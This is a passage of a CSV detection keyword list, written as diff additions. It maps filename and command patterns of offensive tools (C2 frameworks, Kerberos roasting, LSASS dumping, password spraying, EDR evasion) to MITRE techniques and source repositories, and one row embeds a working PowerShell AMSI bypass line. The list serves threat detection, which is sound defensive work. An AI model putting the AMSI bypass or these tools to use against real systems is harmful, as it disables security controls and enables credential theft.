+"*ASBBypass.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*ASBBypass.ps1*","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*ASBBypass.ps1*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*ASRenum-BOF.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" +"*asrep_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is 
a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*asrep2kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*asreprc4_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*asreproast /*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Asreproast.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*ASREPRoast.ps1*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" +"*asreproast_*.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*asreproast_john_results_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*asreproast_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ASreproasting.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*ASRepToHashcat*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*Assemblies/SharpMove.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*assembly *.asm *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*assembly *.exe *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" 
+"*Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'*'NonPublic*Static').SetValue($null*$true)*","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assembly_inject -*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*--assemblyargs AntiVirus AppLocker*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*Assets/solution/dllmain.cpp*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*AssmblyLoader*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*assoc *findstr *=cm*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string =cm - hidden objectif is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc *findstr *lCmd*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string lCmd - hidden objectif is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc *findstr *mdf*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string mdf - hidden objectif is to find cmdfile association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc 
*findstr *s1x*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string s1x - hidden objectif is to find .ps1xml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc *findstr =cm*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string =cm - hidden objectif is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc *findstr lCmd*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string lCmd - hidden objectif is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc *findstr mdf*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string mdf - hidden objectif is to find cmdfile association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc *findstr s1x*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string s1x - hidden objectif is to find .ps1xml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*AsStrongAsFuck.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*AsStrongAsFuck.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion 
Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*async_webshell-all.py*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*AsyncRAT/DCRat*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*asyncssh_commander.py *","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*asyncssh_commander.py*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" 
+"*AteraAgent*AgentPackageRunCommandInteractive.exe*","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*atexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Athena.Forwarders.SMB*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*athena/agent_code/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*AthenaPlugins.csproj*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*AtlasC2*APIModels*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasC2*Client*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasC2*implant*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 
TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasC2*TeamServer*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasC2.exe*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasC2b.exe*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasC2b.sln*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasImplant.yar*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - 
T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasReaper.exe*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*AtlasReaper-main*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*atmail2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*atomizer imap *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*atomizer lync *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*atomizer owa *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*atomizer.py -*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*atomizer.py imap *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*atomizer.py lync *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*atomizer.py owa *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*AtomLdr.dll*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" +"*AtomLdr.sln*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" +"*AtomLdr.vcxproj*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" 
+"*AtomLdr-main.zip*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" +"*ATPMiniDump*","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","1","N/A","N/A","3","253","53","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z" +"*--attack nightmare*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*--attack spoolsample*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*Attack_AmsiOpenSession.ps1*","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - 
